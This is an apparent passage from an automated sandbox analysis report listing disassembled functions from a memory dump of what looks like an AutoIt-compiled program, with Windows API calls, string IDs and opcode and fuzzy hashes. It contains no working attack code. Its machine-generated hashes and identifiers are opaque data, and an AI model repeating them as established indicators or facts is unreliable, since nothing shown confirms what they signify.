                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 252bf48be407629cb665ec7c94ec5c6968b77218ff25a45c6918d16c64144d4b
                                                                                                                      • Instruction ID: 7d8cac388e1cfec015853901762ffdb7a48ea213fb291457386e3f747184aa2f
                                                                                                                      • Opcode Fuzzy Hash: 252bf48be407629cb665ec7c94ec5c6968b77218ff25a45c6918d16c64144d4b
                                                                                                                      • Instruction Fuzzy Hash: F6E0E53237222376F23216116D4AFC76E098B48B10F111026BB08AB2D5CDD14C43C2A0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003DD463
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 003DD493
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 3dd843bf7c0fa685ff26a0ab701f4980224b6bd09c0f5849896b76aea0d3a61e
                                                                                                                      • Instruction ID: 45ca6b71591d8028b431db213e8e578469f24d65a0a40efa8ae9ee73bc872745
                                                                                                                      • Opcode Fuzzy Hash: 3dd843bf7c0fa685ff26a0ab701f4980224b6bd09c0f5849896b76aea0d3a61e
                                                                                                                      • Instruction Fuzzy Hash: 50F0A772740304BBEA262E81FC47FA67B1DEB04795F104016F7051A1D0C9E26C105794
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DD0D4: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 003DD0ED
                                                                                                                        • Part of subcall function 003DD0D4: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003DD127
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 003DD5F2
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003DD602
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 35d24b42314d12f3bdbbcd6cf97e807f8c586e7b5bc22009106b590363681d6e
                                                                                                                      • Instruction ID: fc5f6cf2d7407c038f245d76380f19e4c9f3c7adfd24f90b2ea849fa5d8133d7
                                                                                                                      • Opcode Fuzzy Hash: 35d24b42314d12f3bdbbcd6cf97e807f8c586e7b5bc22009106b590363681d6e
                                                                                                                      • Instruction Fuzzy Hash: 63E0D8763083057FF6221A61BC4BEA77B1DDB48715F114036F70045190EEA3CC215568
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                      • String ID: #32770
                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                      • Opcode ID: 29ba0d90bb74e7203f6d191431d70742188409933cc8d2ec48c435802b204c71
                                                                                                                      • Instruction ID: 291131a341c7333485cf3c0aee713f8ef25ab25193f338304e9f247e9eea7ccb
                                                                                                                      • Opcode Fuzzy Hash: 29ba0d90bb74e7203f6d191431d70742188409933cc8d2ec48c435802b204c71
                                                                                                                      • Instruction Fuzzy Hash: 85E0D833A0022927D721EFA6DC4AFD7FBACEB517A5F10002AF914D3081EAB49A4587D4
                                                                                                                      APIs
                                                                                                                      • __umatherr.LIBCMT ref: 003CDA2A
                                                                                                                        • Part of subcall function 003CDD86: __ctrlfp.LIBCMT ref: 003CDDE5
                                                                                                                      • __ctrlfp.LIBCMT ref: 003CDA47
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __ctrlfp$__umatherr
                                                                                                                      • String ID: xnA
                                                                                                                      • API String ID: 219961500-1594283989
                                                                                                                      • Opcode ID: 215b19be5948c5654cf95e4d04e0db9eeab3005a92eadf5bdd7dc35e3a343630
                                                                                                                      • Instruction ID: 60128f733be66a32ee3fc1812b5def0c0de01226487b276faff0ede9a646a880
                                                                                                                      • Opcode Fuzzy Hash: 215b19be5948c5654cf95e4d04e0db9eeab3005a92eadf5bdd7dc35e3a343630
                                                                                                                      • Instruction Fuzzy Hash: 29E0657140870AAEDB027F90E806B993BA5EF04310F8040A8F98C18496DFB28974D797
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003DB36B
                                                                                                                        • Part of subcall function 003C2011: _doexit.LIBCMT ref: 003C201B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: e847a93158979213662c6afcc3a40fe7303b88a3de4c5260bb9ba003355fb9d8
                                                                                                                      • Instruction ID: 9f2b23bf95852aa0da94f6df0f2049cd002b76740e6871bb628ba8d9d1ba4ee1
                                                                                                                      • Opcode Fuzzy Hash: e847a93158979213662c6afcc3a40fe7303b88a3de4c5260bb9ba003355fb9d8
                                                                                                                      • Instruction Fuzzy Hash: 69D0123238835832D21622987C07FC5B6888F09B51F150017BF08A91C28AD6A890529D
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004084DF
                                                                                                                      • PostMessageW.USER32(00000000), ref: 004084E6
                                                                                                                        • Part of subcall function 003E8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003E83CD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 6ced5f421312e2da23862ced034f44c303770e21463f2a8b05244a929f43f0fe
                                                                                                                      • Instruction ID: 69f3e61696de498a7ffdcadfbcf72119b43658b1db3f95a0564e2396cb4ab32d
                                                                                                                      • Opcode Fuzzy Hash: 6ced5f421312e2da23862ced034f44c303770e21463f2a8b05244a929f43f0fe
                                                                                                                      • Instruction Fuzzy Hash: 17D02232B803107BFB32AB709C0FFC36604EB28B02F500A397309AA1C0CCE4B800C228
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040849F
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004084B2
                                                                                                                        • Part of subcall function 003E8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003E83CD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 8fb55f4fc3da74ad1ff5b7b0629fb262cc0a17b7c8eac334ff84482950251418
                                                                                                                      • Instruction ID: ffc7eca437e61bb56b3fd9ec925fdd820640c8ef68647ef4d9b3228aa83aad90
                                                                                                                      • Opcode Fuzzy Hash: 8fb55f4fc3da74ad1ff5b7b0629fb262cc0a17b7c8eac334ff84482950251418
                                                                                                                      • Instruction Fuzzy Hash: 85D02236B84310B7EB31AB709C0FFC36A04EB24B02F100A39730DAA1C0CCE4B800C228
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 003ED01E
                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 003ED035
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: a245be64b92f1c476b0bed46dccc741253802447562cb56a0a72f5047633a75b
                                                                                                                      • Instruction ID: 65f524041169fac9d8be35bb3260824cff75acb42580a1f7e54ef42fac932bdf
                                                                                                                      • Opcode Fuzzy Hash: a245be64b92f1c476b0bed46dccc741253802447562cb56a0a72f5047633a75b
                                                                                                                      • Instruction Fuzzy Hash: 4BD05EF1A4030EBBDB20ABA0ED0EF99B76CA700705F6041A17A14D10D1D2B4E64A8BA9
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003DCB4B
                                                                                                                      • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 003DCB59
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: ac1b08791141144cd4c318dc732d1b742f08f99c6cd384dd2c36522002cb9abd
                                                                                                                      • Instruction ID: fcf885f61e7194d2204f021f9766525158d89d866a42793a978da669cccae9c6
                                                                                                                      • Opcode Fuzzy Hash: ac1b08791141144cd4c318dc732d1b742f08f99c6cd384dd2c36522002cb9abd
                                                                                                                      • Instruction Fuzzy Hash: 5DC04C716405C0BAE7311B67BC0DD473E3EE7CBF51751426CF215960A686790056D678